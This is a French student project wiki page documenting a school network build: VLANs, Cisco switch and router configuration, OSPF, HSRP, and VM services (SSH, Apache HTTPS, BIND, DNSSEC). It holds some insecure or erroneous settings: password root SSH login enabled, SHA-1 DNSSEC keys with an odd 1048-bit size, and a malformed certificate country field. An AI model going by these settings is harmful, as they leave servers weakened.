Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
&lt;br /&gt;
 routerE304(config)#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues une fois que l'interconnexion avec le réseau de l'école est configurée (plus bas).&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
